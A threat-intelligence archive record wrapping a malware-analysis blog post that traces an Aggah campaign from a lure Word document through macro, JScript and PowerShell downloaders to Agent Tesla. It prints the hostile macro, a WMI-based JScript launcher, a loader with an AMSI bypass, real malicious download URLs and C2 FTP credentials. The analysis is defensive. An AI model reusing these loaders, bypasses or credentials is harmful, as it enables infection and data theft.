{
	"id": "9ae09140-78e7-42f5-a559-f92ec9b92219",
	"created_at": "2026-04-06T00:18:06.362249Z",
	"updated_at": "2026-04-10T03:33:12.488763Z",
	"deleted_at": null,
	"sha1_hash": "c980fda2111ab25fa8c4978f3686151c641de920",
	"title": "(Ab)using bash-fu to analyze recent Aggah sample",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 249041,
	"plain_text": "(Ab)using bash-fu to analyze recent Aggah sample\r\nPublished: 2020-02-26 · Archived: 2026-04-05 18:16:15 UTC\r\nIntro\r\nRecently one of my generic signatures for malformed documents was hit. This type of malformation was used mostly by Zebrocy, so I was curious what's cooking. After some analysis it turns out that the last stage uses tools that are publicly attributed to Aggah, but to get there we need to tear through multiple layers of downloading scripts. We probably could just run our lure document and collect the dropped binaries in a sandbox, but where is the fun in that? Let’s do some work and abuse bash in order to obtain the next stages!\r\nLure document\r\nThe file that caught my attention is 47625e693220465ced292aefd7c61fffc77dedd01618432da177a3b89525be9b, uploaded with the name Updated Pre-Contract.docx from Hong Kong. The file is broken: it is missing one byte and LibreOffice refuses to open it, but we can easily fix that!\r\n(cat /tmp/b93291c5560551ffd4e7f1545c07f403.bin ; printf \"\\x00\" ) \u003e fix.doc\r\nand we are presented with a very blurred JPG embedded in the document. We could also skip the fixing phase and use 7zip to unpack the content of the file, but we need a screenshot of the doc, right? ;]\r\nAnyhow, looking into the file with 7zip is always a good idea, as it may give a clue what to look for:\r\nPath = /tmp/b93291c5560551ffd4e7f1545c07f403.bin\r\nType = zip\r\nERRORS:\r\nUnexpected end of archive\r\nPhysical Size = 39441\r\n Date Time Attr Size Compressed Name\r\nhttps://blog.malwarelab.pl/posts/basfu_aggah/\r\nPage 1 of 8\n\n------------------- ----- ------------ ------------ ------------------------\r\n1980-01-01 00:00:00 ..... 2017 414 [Content_Types].xml\r\n1980-01-01 00:00:00 ..... 737 254 _rels/.rels\r\n1980-01-01 00:00:00 ..... 3781 1146 word/document.xml\r\n1980-01-01 00:00:00 ..... 1509 315 word/_rels/document.xml.rels\r\n1980-01-01 00:00:00 ..... 8814 8814 word/media/image1.jpg\r\n1980-01-01 00:00:00 ..... 6795 1571 word/theme/theme1.xml\r\n1980-01-01 00:00:00 ..... 2938 1065 word/settings.xml\r\n1980-01-01 00:00:00 ..... 213 151 customXml/item1.xml\r\n1980-01-01 00:00:00 ..... 335 243 customXml/itemProps1.xml\r\n1980-01-01 00:00:00 ..... 58402 7000 customXml/item2.xml\r\n1980-01-01 00:00:00 ..... 1088 410 customXml/itemProps2.xml\r\n1980-01-01 00:00:00 ..... 9799 1724 customXml/item3.xml\r\n1980-01-01 00:00:00 ..... 486 292 customXml/itemProps3.xml\r\n1980-01-01 00:00:00 ..... 31158 2054 word/numbering.xml\r\n1980-01-01 00:00:00 ..... 55478 5110 word/styles.xml\r\n1980-01-01 00:00:00 ..... 655 295 word/webSettings.xml\r\n1980-01-01 00:00:00 ..... 2480 584 word/fontTable.xml\r\n1980-01-01 00:00:00 ..... 746 373 docProps/core.xml\r\n1980-01-01 00:00:00 ..... 997 476 docProps/app.xml\r\n1980-01-01 00:00:00 ..... 1036 362 docProps/custom.xml\r\n1980-01-01 00:00:00 ..... 296 194 customXml/_rels/item1.xml.rels\r\n1980-01-01 00:00:00 ..... 296 194 customXml/_rels/item2.xml.rels\r\n1980-01-01 00:00:00 ..... 296 195 customXml/_rels/item3.xml.rels\r\n2020-02-23 22:41:26 ..... 369 224 word/_rels/settings.xml.rels\r\n------------------- ----- ------------ ------------ ------------------------\r\n2020-02-23 22:41:26 190721 33460 24 files\r\nWhat stands out immediately is the date of word/_rels/settings.xml.rels, so this doc is most likely abusing the Ole2Link property to load remote content:\r\n$ extrOle2Link.py /tmp/b93291c5560551ffd4e7f1545c07f403.bin\r\n[!] broken zip - missing 1 bytes\r\n[+] HTTP-Ole2Link in http://office-archives.duckdns.org/cloud/clearance.rtf?raw=true in file word/_rels/settings.xml.rels\r\nAnd indeed it does. You can find this simple script here.\r\nRTF - clearance.rtf\r\nWe got the next stage, 17a8d46df8cdf7db3f9996a25dce7c78abb0cef0d7d55d94d39caf880801466b. Let's look inside!\r\nid |index |OLE Object\r\n---+----------+---------------------------------------------------------------\r\n0 |00002CADh |format_id: 2 (Embedded)\r\n | |class name: 'Excel.Sheet.8'\r\n | |data size: 39936\r\n | |MD5 = 'bf1d62dff81856a2784046b4d3eeab67'\r\n | |CLSID: 00020820-0000-0000-C000-000000000046\r\n | |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)\r\n(...)\r\n---+----------+---------------------------------------------------------------\r\n9 |000F73F1h |format_id: 2 (Embedded)\r\n | |class name: 'Excel.Sheet.8'\r\n | |data size: 39936\r\n | |MD5 = 'bb74ebb70450688af0c862b46c427eec'\r\n | |CLSID: 00020820-0000-0000-C000-000000000046\r\n | |Microsoft Microsoft Excel 97-2003 Worksheet (Excel.Sheet.8)\r\n---+----------+---------------------------------------------------------------\r\nUgh, a lot, but all of them contain the same macro:\r\nPrivate Sub Workbook_BeforeClose(Cancel As Boolean)\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\nWorksheets(1).Activate\r\nA = Range(\"C3\").Comment.Text\r\ncv = StrReverse(Range(\"C4\").Comment.Text)\r\nCall CC0(A, cv)\r\nEnd Sub\r\nFunction CC0(Str, cv)\r\n'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox\r\nSet BMMMEWEUUERTRT = CreateObject(cv)\r\nBMMMEWEUUERTRT.Exec (StrReverse(Str))\r\nEnd Function\r\nHere we should probably turn to a Python library that can view or manipulate xml files, such as xlrd, but this time we are lucky: applying strings(1) on the OLE files quickly yields PowerShell code.\r\nllehS.tpircSW\u003c\r\n)0,\"\"\")'sj.duolc\\'+ 'ATADPPA:vne$'(ssecorp-trats ;XEI|')''sj.duolc\\''+''ATADPPA:vne$'',''sj.nitup/ADN/rg.wercsutats.www//:\r\nWindows UserT\r\nAfter reversing the string, we get proper code:\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'\r\nAll of the OLE files have the same PS payload, but we should verify that!\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\n\u003ccmd /c start /min powershell $t= New-Object -Com Wscript.shell;$t.Run(\"\"\"Powershell '(\u0026'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+\r\nJScript - Putin.js\r\nThe next stage (854a0a9603b288cdf01fdcd0cc7feffb8393d35a80fca6ad981575cbe207aee4) is a JScript; let's take a look.\r\nf=\"K|'' nioj- u4ju435h43u3huhufdhnj$]][rahc[;)77,421,93,93,23,0mossad,501,mossad1,601,54,23,5mossad,4mossad,79,401,76,501\r\nf=f+\"63,23,16,23,801,mossad1,99,mossad1,6mossad,mossad1,4mossad,08,121,6mossad,501,4mossad,7mossad,99,101,38,85,85,39,4mos\r\nAT(\"Powershell \" + REVERSE(replaceAll(f)))\r\nvar CurrentDirectory =WScript.ScriptFullName\r\nAT(\"Powershell \" +\"Remove-Item '\" + CurrentDirectory+\"'\")\r\nfunction AT(strCommand){\r\nvar strComputer = \".\";\r\n var strCommand = strCommand;\r\n var objWMIService = GetObject(\"winmgmts:\\\\\\\\\" + strComputer +\r\n\"\\\\root\\\\CIMV2\");\r\n var objProcess = objWMIService.Get(\"Win32_Process\");\r\n var objInParam =\r\nobjProcess.Methods_(\"Create\").inParameters.SpawnInstance_();\r\n var objStartup =\r\nobjWMIService.Get(\"Win32_ProcessStartup\").SpawnInstance_();\r\n objStartup.ShowWindow = 0;\r\nobjInParam.CommandLine = strCommand;\r\n objInParam.ProcessStartupInformation = objStartup;\r\n var objOutParams = objWMIService.ExecMethod( \"Win32_Process\",\r\n\"Create\", objInParam );\r\n}\r\nfunction replaceAll(str) {\r\n return str.split(\"mossad\").join(\"11\");\r\n}\r\nThis script will fire the encoded PowerShell and clean up all dropped files after its execution. Using WMI instead of ordinarily spawning a cmd.exe is a nice addition. What's inside the encoded blob?\r\n$ cat putin.js | grep 'f=' | cut -d'\"' -f2 | tr -d \"\\n\" | sed -e's/mossad/11/g'|rev |cut -d';' -f2|cut -d'(' -f2 | tr -d\r\n$Tbone='*EX'.replace('*','I');sal M $Tbone;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p2\r\nWell, another downloader.\r\nPowershell - fact.jpg\r\nfact.jpg (59012e676ed866ba013b1d950d1ef0558d7ea09e0a764ff65ee5b43663e918ea) is just a text file with hex-encoded PowerShell separated by dashes:\r\n00000000: 3636 2d37 352d 3645 2d36 332d 3734 2d36 66-75-6E-63-74-6\r\n00000010: 392d 3646 2d36 452d 3230 2d35 352d 3445 9-6F-6E-20-55-4E\r\n00000020: 2d37 302d 3631 2d34 332d 3330 2d36 422d -70-61-43-30-6B-\r\n00000030: 3333 2d33 332d 3333 2d33 332d 3333 2d33 33-33-33-33-33-3\r\n00000040: 302d 3330 2d33 302d 3330 2d33 312d 3331 0-30-30-30-31-31\r\n00000050: 2d33 342d 3337 2d33 352d 3335 2d33 352d -34-37-35-35-35-\r\n00000060: 3230 2d37 422d 3044 2d30 412d 3044 2d30 20-7B-0D-0A-0D-0\r\n00000070: 412d 3039 2d35 422d 3433 2d36 442d 3634 A-09-5B-43-6D-64\r\n00000080: 2d36 432d 3635 2d37 342d 3432 2d36 392d -6C-65-74-42-69-\r\n00000090: 3645 2d36 342d 3639 2d36 452d 3637 2d32 6E-64-69-6E-67-2\r\nLet's decode it.\r\n$ cat fact.jpg | tr \"-\" \"\\n\" | while read n ; do chr $((16#$n)); done \u003e x.ps1\r\nHere we need to cheat a little and abandon bash, as it is very slow to decode this big file (4.7MB) byte-by-byte. So we turn to Python for help:\r\ncat fact.jpg | python2 -c 'import sys; print \"\".join(map(lambda x: chr(int(x,16)),sys.stdin.read().split(\"-\")))' \u003e x.p\r\nHere is the cleaned-up code of the script:\r\nfunction UNpaC0k3333300001147555 {\r\n[CmdletBinding()]\r\n Param ([byte[]] $byteArray)\r\n \r\nProcess {\r\n Write-Verbose \"Get-DecompressedByteArray\"\r\n $input = New-Object System.IO.MemoryStream( , $byteArray )\r\n $output = New-Object System.IO.MemoryStream\r\n $01774000 = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)\r\n $puffpass = New-Object byte[](1024)\r\n while($true){\r\n $read = $01774000.Read($puffpass, 0, 1024)\r\n if ($read -le 0){break}\r\n $output.Write($puffpass, 0, $read)\r\n }\r\n \r\n \r\n[byte[]] $bout333 = $output.ToArray()\r\n Write-Output $bout333\r\n}\r\n}\r\n$t0='DEX'.replace('D','I');sal g $t0;[Byte[]]$MNB=('@!1F,@!8B,@!08,@!00,@!00...').replace('@!','0x'))| g;\r\n[Byte[]]$blindB=('@!1F,@!8B,@!08...').replace('@!','0x'))| g\r\n[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB\r\n$blind=[System.Reflection.Assembly]::Load($deblindB)\r\n[Amsi]::Bypass()\r\n[byte[]]$decompressedByteArray = UNpaC0k3333300001147555 $MNB\r\n[Byte[]]$MNB2=('@!4D,@!5A...').replace('@!','0x'))| g\r\n$t=[System.Reflection.Assembly]::Load($decompressedByteArray)\r\n[rOnAlDo]::ChRiS('InstallUtil.exe',$MNB2)\r\nThis script will load three binaries into memory, two of them compressed and one not. Based on the script we can assume that the last one is the final payload and the others are used for loading. Let's extract them.\r\ncat x.ps1 | grep 'blind' | head -n1 | cut -d \"'\" -f2 | sed -e 's/@!//g' | python2 -c 'import sys;sys.stdout.write(\"\".join\r\ncat x.ps1 | grep 'MNB' | head -n1 | cut -d \"'\" -f2 | sed -e 's/@!//g' | python2 -c 'import sys;sys.stdout.write(\"\".join(ma\r\ncat x.ps1 | grep 'MNB2' | head -n1 | cut -d \"'\" -f2 | sed -e 's/@!//g' | python2 -c 'import sys;sys.stdout.write(\"\".join(m\r\nEndGame\r\nName | Hash | Type | Comment\r\namsi.bin | e4d14ba73670184066a00cf5d3361580f6c4fbc5d0862a90278d82e95426faa5 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | Packed with ConfuserEx v1.0.0\r\nloader.bin | 8ed29945294e0ba0ae9d5c94c3871dfb00eb9c32b2c7a7704005b31642977a02 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | Packed with Unknown Obfuscator\r\npayload.bin | 4cd35bcc7793a04daa0c20774ff2a60c3f1ae693964011cb34d13544dda8b500 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | Packed with ConfuserEx\r\nWhen dealing with .NET malware, dnSpy is your best friend, and while it doesn’t have a flashy GUI when used under Linux, we can still use it to quickly assess what's going on using its console version and Mono. After decompilation and looking into the \u003cModule\u003e.cs file we can see a control flow obfuscation known as CFG flattening, typical of ConfuserEx, so let's remove it using a modified de4dot. Much better, but still nothing obvious to determine the family and C2 address. At the top of the now cleaned \u003cModule\u003e.cs we can see a decryption function:\r\ninternal static string smethod_0(int int_0)\r\n{\r\n object[] array = \u003cModule\u003e.object_0;\r\n if (Assembly.GetExecutingAssembly() == Assembly.GetCallingAssembly())\r\n {\r\n byte[] array2 = new byte[32];\r\n byte[] array3 = new byte[16];\r\n int num = int_0 \u003e\u003e 2;\r\n num = num - 8 + 673 - 34893;\r\n num = (num ^ 673 ^ 4398);\r\n num -= 831;\r\n num = (num - 673) / 8;\r\n uint[] array4 = (uint[])array[num];\r\n byte[] array5 = new byte[array4.Length * 4];\r\n Buffer.BlockCopy(array4, 0, array5, 0, array4.Length * 4);\r\n byte[] array6 = array5;\r\n int num2 = array6.Length - 48;\r\n byte[] array7 = new byte[num2];\r\n Buffer.BlockCopy(array6, 0, array2, 0, 32);\r\n Buffer.BlockCopy(array6, 32, array3, 0, 16);\r\n Buffer.BlockCopy(array6, 48, array7, 0, num2);\r\n return Encoding.UTF8.GetString(\u003cModule\u003e.smethod_1(array7, array2, array3));\r\n }\r\n return \"\";\r\n}\r\n// Token: 0x06000003 RID: 3 RVA: 0x00011150 File Offset: 0x0000F350\r\ninternal static byte[] smethod_1(byte[] byte_0, byte[] byte_1, byte[] byte_2)\r\n{\r\n Rijndael rijndael = Rijndael.Create();\r\n rijndael.Key = byte_1;\r\n rijndael.IV = byte_2;\r\n return rijndael.CreateDecryptor().TransformFinalBlock(byte_0, 0, byte_0.Length);\r\n}\r\nand a huge blob of ints shortly after. Let's make an educated guess and try to decode this blob:\r\ncat JKHLDqkYnadvWavArpqrFZCbXEpmNqbrFOBfl/\\\u003cModule\\\u003e.cs | grep -Pzo \"new uint\\[\\]\\n\\s+{[^}]+}\"| sed -e 's#.new uint..##'\r\nYou can find those strings here. In those strings we can find a bunch of hints about which software this malware steals data from, but mostly we can find information about the C\u0026C server.\r\n...\r\nftp://ftp.metris3d.hu/\r\nseed@metris3d.hu\r\nTeam2318@\r\n...\r\nFurther examination of the strings and code reveals it's Agent Tesla.\r\nAttribution\r\nAt that point I had no idea what I was actually looking at, so I started pivoting - Agent Tesla with Confuser is way too generic, but a loader with an unknown packer can be something unique. If you look closely into Guwav/Properties/AssemblyInfo.cs you can find a very strange definition:\r\n[assembly: AssemblyTrademark(\"kernel32||CreateProcessA||GetThreadContext||Wow64GetThreadContext||SetThreadContext||Wow64S\r\nThis sounds like a great pivot! Indeed it is; soon after querying for\r\nmetadata:\"kernel32||CreateProcessA||GetThreadContext||Wow64GetThreadContext||SetThreadContext||Wow64SetThreadContext||ReadProcessMemory|\r\non VT we will find this:\r\nWhile this is hardly any proof, it's a hint for a direction. After examining the files from VT and the one described in Yoroi’s blog post and comparing them to my loader, I reached the conclusion that it is indeed the same one. However, this loader can still be used by other parties, but while this campaign is quite different from the one previously described, one can find some similarities, such as:\r\n- use of an off-the-shelf .NET RAT\r\n- heavy use of StrReverse in early stages\r\n- mixture of VBS, PowerShell and JScript\r\n- way of encoding the payload in later stages\r\n- consistent way of using ConfuserEx\r\nWith all that in mind I would say with medium confidence that this is another campaign from the Aggah stable.\r\nConclusion\r\nWhen dealing with many script-based droppers, using bash tools such as grep, sed and awk can be a tremendous help, and since most of those encodings are used in only one or two campaigns there is no real need to create tons of throw-away scripts. While this static method of analysis is obviously more tedious and time consuming than throwing things into a sandbox and just reading the results, it may reveal artifacts that would be missed in automated analysis, such as the childish use of the putin and mossad keywords. Another curious thing that we would probably have missed is the password for the FTP account: the same password was mentioned in a PAN Unit42 blog post a few years back, and this password is unique enough to give a clue to the possible history of the group or operator.\r\nAnalysis Artifacts - Hashes, domains, urls, etc\r\nURL:\r\nhttp://office-archives.duckdns.org/cloud/clearance.rtf\r\nhttp://www.statuscrew.gr/NDA/putin.js\r\nhttp://janvierassocies.fr/office/fact.jpg\r\nftp://ftp.metris3d.hu/\r\nHASHES:\r\n47625e693220465ced292aefd7c61fffc77dedd01618432da177a3b89525be9b\r\n17a8d46df8cdf7db3f9996a25dce7c78abb0cef0d7d55d94d39caf880801466b\r\n854a0a9603b288cdf01fdcd0cc7feffb8393d35a80fca6ad981575cbe207aee4\r\n59012e676ed866ba013b1d950d1ef0558d7ea09e0a764ff65ee5b43663e918ea\r\ne4d14ba73670184066a00cf5d3361580f6c4fbc5d0862a90278d82e95426faa5\r\n8ed29945294e0ba0ae9d5c94c3871dfb00eb9c32b2c7a7704005b31642977a02\r\n4cd35bcc7793a04daa0c20774ff2a60c3f1ae693964011cb34d13544dda8b500\r\nFILE NAMES:\r\nUpdated Pre-Contract.docx\r\nInstallUtil.exe\r\ncloud.js\r\nclearance.rtf\r\nC2 LOGIN:\r\nseed@metris3d.hu\r\nTeam2318@\r\nSource: https://blog.malwarelab.pl/posts/basfu_aggah/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarelab.pl/posts/basfu_aggah/"
	],
	"report_names": [
		"basfu_aggah"
	],
	"threat_actors": [
		{
			"id": "b0d34dd6-ee90-483b-bb6c-441332274160",
			"created_at": "2022-10-25T16:07:23.296754Z",
			"updated_at": "2026-04-10T02:00:04.526403Z",
			"deleted_at": null,
			"main_name": "Aggah",
			"aliases": [
				"Operation Red Deer",
				"Operation Roma225"
			],
			"source_name": "ETDA:Aggah",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Aggah",
				"Atros2.CKPN",
				"Bladabindi",
				"Jorik",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"Origin Logger",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Warzone",
				"Warzone RAT",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434686,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c980fda2111ab25fa8c4978f3686151c641de920.pdf",
		"text": "https://archive.orkl.eu/c980fda2111ab25fa8c4978f3686151c641de920.txt",
		"img": "https://archive.orkl.eu/c980fda2111ab25fa8c4978f3686151c641de920.jpg"
	}
}